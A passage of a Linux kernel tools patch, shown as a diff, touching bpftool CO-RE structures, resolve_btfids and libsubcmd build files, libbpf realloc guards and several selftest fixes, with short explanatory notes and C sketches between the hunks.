+ 	e.pid = task->tgid;
+ 	e.id = get_obj_id(file->private_data, obj_type);
+ 
+-	if (obj_type == BPF_OBJ_LINK) {
++	if (obj_type == BPF_OBJ_LINK &&
++	    bpf_core_enum_value_exists(enum bpf_link_type___local,
++				       BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 		struct bpf_link *link = (struct bpf_link *) file->private_data;
+ 
+-		if (BPF_CORE_READ(link, type) == BPF_LINK_TYPE_PERF_EVENT) {
++		if (link->type == bpf_core_enum_value(enum bpf_link_type___local,
++						      BPF_LINK_TYPE_PERF_EVENT___local)) {
+ 			e.has_bpf_cookie = true;
+ 			e.bpf_cookie = get_bpf_cookie(link);
+ 		}
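
The pid_iter change is an instance of a general libbpf CO-RE convention: a BPF program that needs a kernel-internal type redeclares a minimal copy with a "___local" flavor suffix and preserve_access_index, and feature-tests enum values at load time instead of hard-coding them; libbpf strips everything from "___" onward when matching the type against the running kernel's BTF. A stripped-down sketch of the convention (the field chosen here is purely illustrative):

    /* CO-RE "___local mirror" sketch -- relocated against kernel BTF */
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_core_read.h>

    struct task_struct___local {
            int pid;
    } __attribute__((preserve_access_index));

    static __always_inline int read_pid(void *task)
    {
            struct task_struct___local *t = task;

            /* the offset of ->pid is fixed up at load time, not compile time */
            return BPF_CORE_READ(t, pid);
    }

    char LICENSE[] SEC("license") = "GPL";
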
+diff --git a/tools/bpf/bpftool/skeleton/profiler.bpf.c b/tools/bpf/bpftool/skeleton/profiler.bpf.c
+index ce5b65e07ab10..2f80edc682f11 100644
+--- a/tools/bpf/bpftool/skeleton/profiler.bpf.c
++++ b/tools/bpf/bpftool/skeleton/profiler.bpf.c
+@@ -4,6 +4,12 @@
+ #include <bpf/bpf_helpers.h>
+ #include <bpf/bpf_tracing.h>
+ 
++struct bpf_perf_event_value___local {
++	__u64 counter;
++	__u64 enabled;
++	__u64 running;
++} __attribute__((preserve_access_index));
++
+ /* map of perf event fds, num_cpu * num_metric entries */
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+@@ -15,14 +21,14 @@ struct {
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
+ 	__uint(key_size, sizeof(u32));
+-	__uint(value_size, sizeof(struct bpf_perf_event_value));
++	__uint(value_size, sizeof(struct bpf_perf_event_value___local));
+ } fentry_readings SEC(".maps");
+ 
+ /* accumulated readings */
+ struct {
+ 	__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
+ 	__uint(key_size, sizeof(u32));
+-	__uint(value_size, sizeof(struct bpf_perf_event_value));
++	__uint(value_size, sizeof(struct bpf_perf_event_value___local));
+ } accum_readings SEC(".maps");
+ 
+ /* sample counts, one per cpu */
+@@ -39,7 +45,7 @@ const volatile __u32 num_metric = 1;
+ SEC("fentry/XXX")
+ int BPF_PROG(fentry_XXX)
+ {
+-	struct bpf_perf_event_value *ptrs[MAX_NUM_MATRICS];
++	struct bpf_perf_event_value___local *ptrs[MAX_NUM_MATRICS];
+ 	u32 key = bpf_get_smp_processor_id();
+ 	u32 i;
+ 
+@@ -53,10 +59,10 @@ int BPF_PROG(fentry_XXX)
+ 	}
+ 
+ 	for (i = 0; i < num_metric && i < MAX_NUM_MATRICS; i++) {
+-		struct bpf_perf_event_value reading;
++		struct bpf_perf_event_value___local reading;
+ 		int err;
+ 
+-		err = bpf_perf_event_read_value(&events, key, &reading,
++		err = bpf_perf_event_read_value(&events, key, (void *)&reading,
+ 						sizeof(reading));
+ 		if (err)
+ 			return 0;
+@@ -68,14 +74,14 @@ int BPF_PROG(fentry_XXX)
+ }
+ 
+ static inline void
+-fexit_update_maps(u32 id, struct bpf_perf_event_value *after)
++fexit_update_maps(u32 id, struct bpf_perf_event_value___local *after)
+ {
+-	struct bpf_perf_event_value *before, diff;
++	struct bpf_perf_event_value___local *before, diff;
+ 
+ 	before = bpf_map_lookup_elem(&fentry_readings, &id);
+ 	/* only account samples with a valid fentry_reading */
+ 	if (before && before->counter) {
+-		struct bpf_perf_event_value *accum;
++		struct bpf_perf_event_value___local *accum;
+ 
+ 		diff.counter = after->counter - before->counter;
+ 		diff.enabled = after->enabled - before->enabled;
+@@ -93,7 +99,7 @@ fexit_update_maps(u32 id, struct bpf_perf_event_value *after)
+ SEC("fexit/XXX")
+ int BPF_PROG(fexit_XXX)
+ {
+-	struct bpf_perf_event_value readings[MAX_NUM_MATRICS];
++	struct bpf_perf_event_value___local readings[MAX_NUM_MATRICS];
+ 	u32 cpu = bpf_get_smp_processor_id();
+ 	u32 i, zero = 0;
+ 	int err;
+@@ -102,7 +108,8 @@ int BPF_PROG(fexit_XXX)
+ 	/* read all events before updating the maps, to reduce error */
+ 	for (i = 0; i < num_metric && i < MAX_NUM_MATRICS; i++) {
+ 		err = bpf_perf_event_read_value(&events, cpu + i * num_cpu,
+-						readings + i, sizeof(*readings));
++						(void *)(readings + i),
++						sizeof(*readings));
+ 		if (err)
+ 			return 0;
+ 	}
+diff --git a/tools/bpf/resolve_btfids/Build b/tools/bpf/resolve_btfids/Build
+index ae82da03f9bf9..077de3829c722 100644
+--- a/tools/bpf/resolve_btfids/Build
++++ b/tools/bpf/resolve_btfids/Build
+@@ -1,3 +1,5 @@
++hostprogs := resolve_btfids
++
+ resolve_btfids-y += main.o
+ resolve_btfids-y += rbtree.o
+ resolve_btfids-y += zalloc.o
+@@ -7,4 +9,4 @@ resolve_btfids-y += str_error_r.o
+ 
+ $(OUTPUT)%.o: ../../lib/%.c FORCE
+ 	$(call rule_mkdir)
+-	$(call if_changed_dep,cc_o_c)
++	$(call if_changed_dep,host_cc_o_c)
+diff --git a/tools/bpf/resolve_btfids/Makefile b/tools/bpf/resolve_btfids/Makefile
+index 19a3112e271ac..4b8079f294f65 100644
+--- a/tools/bpf/resolve_btfids/Makefile
++++ b/tools/bpf/resolve_btfids/Makefile
+@@ -17,15 +17,15 @@ else
+   MAKEFLAGS=--no-print-directory
+ endif
+ 
+-# always use the host compiler
+-AR       = $(HOSTAR)
+-CC       = $(HOSTCC)
+-LD       = $(HOSTLD)
+-ARCH     = $(HOSTARCH)
++# Overrides for the prepare step libraries.
++HOST_OVERRIDES := AR="$(HOSTAR)" CC="$(HOSTCC)" LD="$(HOSTLD)" ARCH="$(HOSTARCH)" \
++		  CROSS_COMPILE="" EXTRA_CFLAGS="$(HOSTCFLAGS)"
++
+ RM      ?= rm
++HOSTCC  ?= gcc
++HOSTLD  ?= ld
++HOSTAR  ?= ar
+ CROSS_COMPILE =
+-CFLAGS  := $(KBUILD_HOSTCFLAGS)
+-LDFLAGS := $(KBUILD_HOSTLDFLAGS)
+ 
+ OUTPUT ?= $(srctree)/tools/bpf/resolve_btfids/
+ 
+@@ -35,51 +35,64 @@ SUBCMD_SRC := $(srctree)/tools/lib/subcmd/
+ BPFOBJ     := $(OUTPUT)/libbpf/libbpf.a
+ LIBBPF_OUT := $(abspath $(dir $(BPFOBJ)))/
+ SUBCMDOBJ  := $(OUTPUT)/libsubcmd/libsubcmd.a
++SUBCMD_OUT := $(abspath $(dir $(SUBCMDOBJ)))/
+ 
+ LIBBPF_DESTDIR := $(LIBBPF_OUT)
+ LIBBPF_INCLUDE := $(LIBBPF_DESTDIR)include
+ 
++SUBCMD_DESTDIR := $(SUBCMD_OUT)
++SUBCMD_INCLUDE := $(SUBCMD_DESTDIR)include
++
+ BINARY     := $(OUTPUT)/resolve_btfids
+ BINARY_IN  := $(BINARY)-in.o
+ 
+ all: $(BINARY)
+ 
++prepare: $(BPFOBJ) $(SUBCMDOBJ)
++
+ $(OUTPUT) $(OUTPUT)/libsubcmd $(LIBBPF_OUT):
+ 	$(call msg,MKDIR,,$@)
+ 	$(Q)mkdir -p $(@)
+ 
+ $(SUBCMDOBJ): fixdep FORCE | $(OUTPUT)/libsubcmd
+-	$(Q)$(MAKE) -C $(SUBCMD_SRC) OUTPUT=$(abspath $(dir $@))/ $(abspath $@)
++	$(Q)$(MAKE) -C $(SUBCMD_SRC) OUTPUT=$(SUBCMD_OUT) \
++		    DESTDIR=$(SUBCMD_DESTDIR) $(HOST_OVERRIDES) prefix= subdir= \
++		    $(abspath $@) install_headers
+ 
+ $(BPFOBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(LIBBPF_OUT)
+ 	$(Q)$(MAKE) $(submake_extras) -C $(LIBBPF_SRC) OUTPUT=$(LIBBPF_OUT)    \
+-		    DESTDIR=$(LIBBPF_DESTDIR) prefix= EXTRA_CFLAGS="$(CFLAGS)" \
++		    DESTDIR=$(LIBBPF_DESTDIR) $(HOST_OVERRIDES) prefix= subdir= \
+ 		    $(abspath $@) install_headers
+ 
+-CFLAGS += -g \
++LIBELF_FLAGS := $(shell $(HOSTPKG_CONFIG) libelf --cflags 2>/dev/null)
++LIBELF_LIBS  := $(shell $(HOSTPKG_CONFIG) libelf --libs 2>/dev/null || echo -lelf)
++
++HOSTCFLAGS_resolve_btfids += -g \
+           -I$(srctree)/tools/include \
+           -I$(srctree)/tools/include/uapi \
+           -I$(LIBBPF_INCLUDE) \
+-          -I$(SUBCMD_SRC)
++          -I$(SUBCMD_INCLUDE) \
++          $(LIBELF_FLAGS)
+ 
+-LIBS = -lelf -lz
++LIBS = $(LIBELF_LIBS) -lz
+ 
+-export srctree OUTPUT CFLAGS Q
++export srctree OUTPUT HOSTCFLAGS_resolve_btfids Q HOSTCC HOSTLD HOSTAR
+ include $(srctree)/tools/build/Makefile.include
+ 
+-$(BINARY_IN): $(BPFOBJ) fixdep FORCE | $(OUTPUT)
++$(BINARY_IN): fixdep FORCE prepare | $(OUTPUT)
+ 	$(Q)$(MAKE) $(build)=resolve_btfids
+ 
+ $(BINARY): $(BPFOBJ) $(SUBCMDOBJ) $(BINARY_IN)
+ 	$(call msg,LINK,$@)
+-	$(Q)$(CC) $(BINARY_IN) $(LDFLAGS) -o $@ $(BPFOBJ) $(SUBCMDOBJ) $(LIBS)
++	$(Q)$(HOSTCC) $(BINARY_IN) $(KBUILD_HOSTLDFLAGS) -o $@ $(BPFOBJ) $(SUBCMDOBJ) $(LIBS)
+ 
+ clean_objects := $(wildcard $(OUTPUT)/*.o                \
+                             $(OUTPUT)/.*.o.cmd           \
+                             $(OUTPUT)/.*.o.d             \
+                             $(LIBBPF_OUT)                \
+                             $(LIBBPF_DESTDIR)            \
+-                            $(OUTPUT)/libsubcmd          \
++                            $(SUBCMD_OUT)                \
++                            $(SUBCMD_DESTDIR)            \
+                             $(OUTPUT)/resolve_btfids)
+ 
+ ifneq ($(clean_objects),)
+@@ -96,4 +109,4 @@ tags:
+ 
+ FORCE:
+ 
+-.PHONY: all FORCE clean tags
++.PHONY: all FORCE clean tags prepare
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 80cd7843c6778..77058174082d7 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -75,7 +75,7 @@
+ #include <linux/err.h>
+ #include <bpf/btf.h>
+ #include <bpf/libbpf.h>
+-#include <parse-options.h>
++#include <subcmd/parse-options.h>
+ 
+ #define BTF_IDS_SECTION	".BTF_ids"
+ #define BTF_ID		"__BTF_ID__"
+diff --git a/tools/hv/vmbus_testing b/tools/hv/vmbus_testing
+index e7212903dd1d9..4467979d8f699 100755
+--- a/tools/hv/vmbus_testing
++++ b/tools/hv/vmbus_testing
+@@ -164,7 +164,7 @@ def recursive_file_lookup(path, file_map):
+ def get_all_devices_test_status(file_map):
+ 
+         for device in file_map:
+-                if (get_test_state(locate_state(device, file_map)) is 1):
++                if (get_test_state(locate_state(device, file_map)) == 1):
+                         print("Testing = ON for: {}"
+                               .format(device.split("/")[5]))
+                 else:
+@@ -203,7 +203,7 @@ def write_test_files(path, value):
+ def set_test_state(state_path, state_value, quiet):
+ 
+         write_test_files(state_path, state_value)
+-        if (get_test_state(state_path) is 1):
++        if (get_test_state(state_path) == 1):
+                 if (not quiet):
+                         print("Testing = ON for device: {}"
+                               .format(state_path.split("/")[5]))
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index b9a29d1053765..eeb2693128d8a 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -6063,7 +6063,11 @@ static int append_subprog_relos(struct bpf_program *main_prog, struct bpf_progra
+ 	if (main_prog == subprog)
+ 		return 0;
+ 	relos = libbpf_reallocarray(main_prog->reloc_desc, new_cnt, sizeof(*relos));
+-	if (!relos)
++	/* if new count is zero, reallocarray can return a valid NULL result;
++	 * in this case the previous pointer will be freed, so we *have to*
++	 * reassign old pointer to the new value (even if it's NULL)
++	 */
++	if (!relos && new_cnt)
+ 		return -ENOMEM;
+ 	if (subprog->nr_reloc)
+ 		memcpy(relos + main_prog->nr_reloc, subprog->reloc_desc,
+@@ -8345,7 +8349,8 @@ int bpf_program__set_insns(struct bpf_program *prog,
+ 		return -EBUSY;
+ 
+ 	insns = libbpf_reallocarray(prog->insns, new_insn_cnt, sizeof(*insns));
+-	if (!insns) {
++	/* NULL is a valid return from reallocarray if the new count is zero */
++	if (!insns && new_insn_cnt) {
+ 		pr_warn("prog '%s': failed to realloc prog code\n", prog->name);
+ 		return -ENOMEM;
+ 	}
+@@ -8640,7 +8645,11 @@ int libbpf_unregister_prog_handler(int handler_id)
+ 
+ 	/* try to shrink the array, but it's ok if we couldn't */
+ 	sec_defs = libbpf_reallocarray(custom_sec_defs, custom_sec_def_cnt, sizeof(*sec_defs));
+-	if (sec_defs)
++	/* if new count is zero, reallocarray can return a valid NULL result;
++	 * in this case the previous pointer will be freed, so we *have to*
++	 * reassign old pointer to the new value (even if it's NULL)
++	 */
++	if (sec_defs || custom_sec_def_cnt == 0)
+ 		custom_sec_defs = sec_defs;
+ 
+ 	return 0;
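
Both libbpf hunks guard the same C corner case: reallocarray(), like realloc() on C libraries where realloc(p, 0) frees p and returns NULL, can legitimately return NULL for a zero count -- in which case the old pointer is gone and the NULL must be stored back rather than treated as ENOMEM. A standalone sketch of the guard:

    /* zero-count realloc guard; NULL is an error only if a size was asked */
    #include <stdlib.h>

    static int resize(int **arr, size_t new_cnt)
    {
            int *tmp = realloc(*arr, new_cnt * sizeof(**arr));

            if (!tmp && new_cnt)
                    return -1;      /* genuine allocation failure (-ENOMEM) */

            *arr = tmp;             /* keep the (possibly NULL) new pointer */
            return 0;
    }
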
+diff --git a/tools/lib/bpf/usdt.c b/tools/lib/bpf/usdt.c
+index 49f3c3b7f6095..af1cb30556b46 100644
+--- a/tools/lib/bpf/usdt.c
++++ b/tools/lib/bpf/usdt.c
+@@ -852,8 +852,11 @@ static int bpf_link_usdt_detach(struct bpf_link *link)
+ 		 * system is so exhausted on memory, it's the least of user's
+ 		 * concerns, probably.
+ 		 * So just do our best here to return those IDs to usdt_manager.
++		 * Another edge case when we can legitimately get NULL is when
++		 * new_cnt is zero, which can happen in some edge cases, so we
++		 * need to be careful about that.
+ 		 */
+-		if (new_free_ids) {
++		if (new_free_ids || new_cnt == 0) {
+ 			memcpy(new_free_ids + man->free_spec_cnt, usdt_link->spec_ids,
+ 			       usdt_link->spec_cnt * sizeof(*usdt_link->spec_ids));
+ 			man->free_spec_ids = new_free_ids;
+diff --git a/tools/lib/subcmd/Makefile b/tools/lib/subcmd/Makefile
+index 8f1a09cdfd17e..b87213263a5e0 100644
+--- a/tools/lib/subcmd/Makefile
++++ b/tools/lib/subcmd/Makefile
+@@ -17,6 +17,15 @@ RM = rm -f
+ 
+ MAKEFLAGS += --no-print-directory
+ 
++INSTALL = install
++
++# Use DESTDIR for installing into a different root directory.
++# This is useful for building a package. The program will be
++# installed in this directory as if it was the root directory.
++# Then the build tool can move it later.
++DESTDIR ?=
++DESTDIR_SQ = '$(subst ','\'',$(DESTDIR))'
++
+ LIBFILE = $(OUTPUT)libsubcmd.a
+ 
+ CFLAGS := -ggdb3 -Wall -Wextra -std=gnu99 -fPIC
+@@ -48,6 +57,18 @@ CFLAGS += $(EXTRA_WARNINGS) $(EXTRA_CFLAGS)
+ 
+ SUBCMD_IN := $(OUTPUT)libsubcmd-in.o
+ 
++ifeq ($(LP64), 1)
++  libdir_relative = lib64
++else
++  libdir_relative = lib
++endif
++
++prefix ?=
++libdir = $(prefix)/$(libdir_relative)
++
++# Shell quotes
++libdir_SQ = $(subst ','\'',$(libdir))
++
+ all:
+ 
+ export srctree OUTPUT CC LD CFLAGS V
+@@ -61,6 +82,37 @@ $(SUBCMD_IN): FORCE
+ $(LIBFILE): $(SUBCMD_IN)
+ 	$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(SUBCMD_IN)
+ 
++define do_install_mkdir
++	if [ ! -d '$(DESTDIR_SQ)$1' ]; then             \
++		$(INSTALL) -d -m 755 '$(DESTDIR_SQ)$1'; \
++	fi
++endef
++
++define do_install
++	if [ ! -d '$2' ]; then             \
++		$(INSTALL) -d -m 755 '$2'; \
++	fi;                                             \
++	$(INSTALL) $1 $(if $3,-m $3,) '$2'
++endef
++
++install_lib: $(LIBFILE)
++	$(call QUIET_INSTALL, $(LIBFILE)) \
++		$(call do_install_mkdir,$(libdir_SQ)); \
++		cp -fpR $(LIBFILE) $(DESTDIR)$(libdir_SQ)
++
++HDRS := exec-cmd.h help.h pager.h parse-options.h run-command.h
++INSTALL_HDRS_PFX := $(DESTDIR)$(prefix)/include/subcmd
++INSTALL_HDRS := $(addprefix $(INSTALL_HDRS_PFX)/, $(HDRS))
++
++$(INSTALL_HDRS): $(INSTALL_HDRS_PFX)/%.h: %.h
++	$(call QUIET_INSTALL, $@) \
++		$(call do_install,$<,$(INSTALL_HDRS_PFX)/,644)
++
++install_headers: $(INSTALL_HDRS)
++	$(call QUIET_INSTALL, libsubcmd_headers)
++
++install: install_lib install_headers
++
+ clean:
+ 	$(call QUIET_CLEAN, libsubcmd) $(RM) $(LIBFILE); \
+ 	find $(or $(OUTPUT),.) -name \*.o -or -name \*.o.cmd -or -name \*.o.d | xargs $(RM)
+diff --git a/tools/testing/radix-tree/multiorder.c b/tools/testing/radix-tree/multiorder.c
+index e00520cc63498..cffaf2245d4f1 100644
+--- a/tools/testing/radix-tree/multiorder.c
++++ b/tools/testing/radix-tree/multiorder.c
+@@ -159,7 +159,7 @@ void multiorder_tagged_iteration(struct xarray *xa)
+ 	item_kill_tree(xa);
+ }
+ 
+-bool stop_iteration = false;
++bool stop_iteration;
+ 
+ static void *creator_func(void *ptr)
+ {
+@@ -201,6 +201,7 @@ static void multiorder_iteration_race(struct xarray *xa)
+ 	pthread_t worker_thread[num_threads];
+ 	int i;
+ 
++	stop_iteration = false;
+ 	pthread_create(&worker_thread[0], NULL, &creator_func, xa);
+ 	for (i = 1; i < num_threads; i++)
+ 		pthread_create(&worker_thread[i], NULL, &iterator_func, xa);
+@@ -211,6 +212,61 @@ static void multiorder_iteration_race(struct xarray *xa)
+ 	item_kill_tree(xa);
+ }
+ 
++static void *load_creator(void *ptr)
++{
++	/* 'order' is set up to ensure we have sibling entries */
++	unsigned int order;
++	struct radix_tree_root *tree = ptr;
++	int i;
++
++	rcu_register_thread();
++	item_insert_order(tree, 3 << RADIX_TREE_MAP_SHIFT, 0);
++	item_insert_order(tree, 2 << RADIX_TREE_MAP_SHIFT, 0);
++	for (i = 0; i < 10000; i++) {
++		for (order = 1; order < RADIX_TREE_MAP_SHIFT; order++) {
++			unsigned long index = (3 << RADIX_TREE_MAP_SHIFT) -
++						(1 << order);
++			item_insert_order(tree, index, order);
++			item_delete_rcu(tree, index);
++		}
++	}
++	rcu_unregister_thread();
++
++	stop_iteration = true;
++	return NULL;
++}
++
++static void *load_worker(void *ptr)
++{
++	unsigned long index = (3 << RADIX_TREE_MAP_SHIFT) - 1;
++
++	rcu_register_thread();
++	while (!stop_iteration) {
++		struct item *item = xa_load(ptr, index);
++		assert(!xa_is_internal(item));
++	}
++	rcu_unregister_thread();
++
++	return NULL;
++}
++
++static void load_race(struct xarray *xa)
++{
++	const int num_threads = sysconf(_SC_NPROCESSORS_ONLN) * 4;
++	pthread_t worker_thread[num_threads];
++	int i;
++
++	stop_iteration = false;
++	pthread_create(&worker_thread[0], NULL, &load_creator, xa);
++	for (i = 1; i < num_threads; i++)
++		pthread_create(&worker_thread[i], NULL, &load_worker, xa);
++
++	for (i = 0; i < num_threads; i++)
++		pthread_join(worker_thread[i], NULL);
++
++	item_kill_tree(xa);
++}
++
+ static DEFINE_XARRAY(array);
+ 
+ void multiorder_checks(void)
+@@ -218,12 +274,20 @@ void multiorder_checks(void)
+ 	multiorder_iteration(&array);
+ 	multiorder_tagged_iteration(&array);
+ 	multiorder_iteration_race(&array);
++	load_race(&array);
+ 
+ 	radix_tree_cpu_dead(0);
+ }
+ 
+-int __weak main(void)
++int __weak main(int argc, char **argv)
+ {
++	int opt;
++
++	while ((opt = getopt(argc, argv, "ls:v")) != -1) {
++		if (opt == 'v')
++			test_verbose++;
++	}
++
+ 	rcu_register_thread();
+ 	radix_tree_init();
+ 	multiorder_checks();
+diff --git a/tools/testing/selftests/bpf/benchs/run_bench_rename.sh b/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
+index 16f774b1cdbed..7b281dbe41656 100755
+--- a/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
++++ b/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
+@@ -2,7 +2,7 @@
+ 
+ set -eufo pipefail
+ 
+-for i in base kprobe kretprobe rawtp fentry fexit fmodret
++for i in base kprobe kretprobe rawtp fentry fexit
+ do
+ 	summary=$(sudo ./bench -w2 -d5 -a rename-$i | tail -n1 | cut -d'(' -f1 | cut -d' ' -f3-)
+ 	printf "%-10s: %s\n" $i "$summary"
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_nf.c b/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
+index 8a838ea8bdf3b..b2998896f9f7b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
+@@ -123,12 +123,13 @@ static void test_bpf_nf_ct(int mode)
+ 	ASSERT_EQ(skel->data->test_snat_addr, 0, "Test for source natting");
+ 	ASSERT_EQ(skel->data->test_dnat_addr, 0, "Test for destination natting");
+ end:
+-	if (srv_client_fd != -1)
+-		close(srv_client_fd);
+ 	if (client_fd != -1)
+ 		close(client_fd);
++	if (srv_client_fd != -1)
++		close(srv_client_fd);
+ 	if (srv_fd != -1)
+ 		close(srv_fd);
++
+ 	snprintf(cmd, sizeof(cmd), iptables, "-D");
+ 	system(cmd);
+ 	test_bpf_nf__destroy(skel);
+diff --git a/tools/testing/selftests/bpf/prog_tests/kfunc_call.c b/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
+index 5af1ee8f0e6ee..36071f3f15ba1 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
++++ b/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
+@@ -171,8 +171,8 @@ static void verify_fail(struct kfunc_test_params *param)
+ 	case tc_test:
+ 		topts.data_in = &pkt_v4;
+ 		topts.data_size_in = sizeof(pkt_v4);
+-		break;
+ 		topts.repeat = 1;
++		break;
+ 	}
+ 
+ 	skel = kfunc_call_fail__open_opts(&opts);
+diff --git a/tools/testing/selftests/bpf/progs/test_cls_redirect.h b/tools/testing/selftests/bpf/progs/test_cls_redirect.h
+index 76eab0aacba0c..233b089d1fbac 100644
+--- a/tools/testing/selftests/bpf/progs/test_cls_redirect.h
++++ b/tools/testing/selftests/bpf/progs/test_cls_redirect.h
+@@ -12,6 +12,15 @@
+ #include <linux/ipv6.h>
+ #include <linux/udp.h>
+ 
++/* offsetof() is used in static asserts, and the libbpf-redefined CO-RE
++ * friendly version breaks compilation for older clang versions <= 15
++ * when invoked in a static assert.  Restore original here.
++ */
++#ifdef offsetof
++#undef offsetof
++#define offsetof(type, member) __builtin_offsetof(type, member)
++#endif
++
+ struct gre_base_hdr {
+ 	uint16_t flags;
+ 	uint16_t protocol;
+diff --git a/tools/testing/selftests/futex/functional/futex_wait_timeout.c b/tools/testing/selftests/futex/functional/futex_wait_timeout.c
+index 3651ce17beeb9..d183f878360bc 100644
+--- a/tools/testing/selftests/futex/functional/futex_wait_timeout.c
++++ b/tools/testing/selftests/futex/functional/futex_wait_timeout.c
+@@ -24,6 +24,7 @@
+ 
+ static long timeout_ns = 100000;	/* 100us default timeout */
+ static futex_t futex_pi;
++static pthread_barrier_t barrier;
+ 
+ void usage(char *prog)
+ {
+@@ -48,6 +49,8 @@ void *get_pi_lock(void *arg)
+ 	if (ret != 0)
+ 		error("futex_lock_pi failed\n", ret);
+ 
++	pthread_barrier_wait(&barrier);
++
+ 	/* Blocks forever */
+ 	ret = futex_wait(&lock, 0, NULL, 0);
+ 	error("futex_wait failed\n", ret);
+@@ -130,6 +133,7 @@ int main(int argc, char *argv[])
+ 	       basename(argv[0]));
+ 	ksft_print_msg("\tArguments: timeout=%ldns\n", timeout_ns);
+ 
++	pthread_barrier_init(&barrier, NULL, 2);
+ 	pthread_create(&thread, NULL, get_pi_lock, NULL);
+ 
+ 	/* initialize relative timeout */
+@@ -163,6 +167,9 @@ int main(int argc, char *argv[])
+ 	res = futex_wait_requeue_pi(&f1, f1, &futex_pi, &to, 0);
+ 	test_timeout(res, &ret, "futex_wait_requeue_pi monotonic", ETIMEDOUT);
+ 
++	/* Wait until the other thread calls futex_lock_pi() */
++	pthread_barrier_wait(&barrier);
++	pthread_barrier_destroy(&barrier);
+ 	/*
+ 	 * FUTEX_LOCK_PI with CLOCK_REALTIME
+ 	 * Due to historical reasons, FUTEX_LOCK_PI supports only realtime
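
The futex-test fix is a classic two-thread rendezvous: the main thread must not proceed until the helper really holds the PI lock, and a two-party pthread barrier expresses that directly. A self-contained sketch of the synchronization shape (the "resource" here is an abstract placeholder):

    /* 2-party pthread barrier as a startup rendezvous */
    #include <pthread.h>

    static pthread_barrier_t barrier;

    static void *helper(void *arg)
    {
            /* ... acquire the resource the main thread will contend on ... */
            pthread_barrier_wait(&barrier);   /* signal: resource is held */
            return arg;
    }

    int main(void)
    {
            pthread_t t;

            pthread_barrier_init(&barrier, NULL, 2);
            pthread_create(&t, NULL, helper, NULL);

            pthread_barrier_wait(&barrier);   /* block until helper is ready */
            /* ... now it is safe to test contention on the resource ... */

            pthread_join(t, NULL);
            pthread_barrier_destroy(&barrier);
            return 0;
    }
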
+diff --git a/tools/testing/selftests/kselftest_harness.h b/tools/testing/selftests/kselftest_harness.h
+index 25f4d54067c0e..584687c3286dd 100644
+--- a/tools/testing/selftests/kselftest_harness.h
++++ b/tools/testing/selftests/kselftest_harness.h
+@@ -937,7 +937,11 @@ void __wait_for_test(struct __test_metadata *t)
+ 		fprintf(TH_LOG_STREAM,
+ 			"# %s: Test terminated by timeout\n", t->name);
+ 	} else if (WIFEXITED(status)) {
+-		if (t->termsig != -1) {
++		if (WEXITSTATUS(status) == 255) {
++			/* SKIP */
++			t->passed = 1;
++			t->skip = 1;
++		} else if (t->termsig != -1) {
+ 			t->passed = 0;
+ 			fprintf(TH_LOG_STREAM,
+ 				"# %s: Test exited normally instead of by signal (code: %d)\n",
+@@ -949,11 +953,6 @@ void __wait_for_test(struct __test_metadata *t)
+ 			case 0:
+ 				t->passed = 1;
+ 				break;
+-			/* SKIP */
+-			case 255:
+-				t->passed = 1;
+-				t->skip = 1;
+-				break;
+ 			/* Other failure, assume step report. */
+ 			default:
+ 				t->passed = 0;
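
The harness hunk reorders the wait-status classification so the kselftest SKIP convention (exit code 255) takes precedence over the "expected a signal, got a normal exit" check. A hedged sketch of the resulting decision order, with simplified flags in place of the harness's metadata struct:

    /* wait-status classification: SKIP wins over the termsig branch */
    #include <sys/wait.h>

    static void classify(int status, int termsig, int *passed, int *skip)
    {
            if (!WIFEXITED(status))
                    return;
            if (WEXITSTATUS(status) == 255) {        /* kselftest SKIP */
                    *passed = 1;
                    *skip = 1;
            } else if (termsig != -1) {
                    *passed = 0;                     /* expected signal, got exit */
            } else {
                    *passed = (WEXITSTATUS(status) == 0);
            }
    }
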
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 73d53257df42f..5073dbc961258 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -7,4 +7,4 @@ TEST_GEN_PROGS := resctrl_tests
+ 
+ include ../lib.mk
+ 
+-$(OUTPUT)/resctrl_tests: $(wildcard *.c)
++$(OUTPUT)/resctrl_tests: $(wildcard *.[ch])
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 0485863a169f2..338f714453935 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -89,21 +89,19 @@ static int reset_enable_llc_perf(pid_t pid, int cpu_no)
+ static int get_llc_perf(unsigned long *llc_perf_miss)
+ {
+ 	__u64 total_misses;
++	int ret;
+ 
+ 	/* Stop counters after one span to get miss rate */
+ 
+ 	ioctl(fd_lm, PERF_EVENT_IOC_DISABLE, 0);
+ 
+-	if (read(fd_lm, &rf_cqm, sizeof(struct read_format)) == -1) {
++	ret = read(fd_lm, &rf_cqm, sizeof(struct read_format));
++	if (ret == -1) {
+ 		perror("Could not get llc misses through perf");
+-
+ 		return -1;
+ 	}
+ 
+ 	total_misses = rf_cqm.values[0].value;
+-
+-	close(fd_lm);
+-
+ 	*llc_perf_miss = total_misses;
+ 
+ 	return 0;
+@@ -258,19 +256,25 @@ int cat_val(struct resctrl_val_param *param)
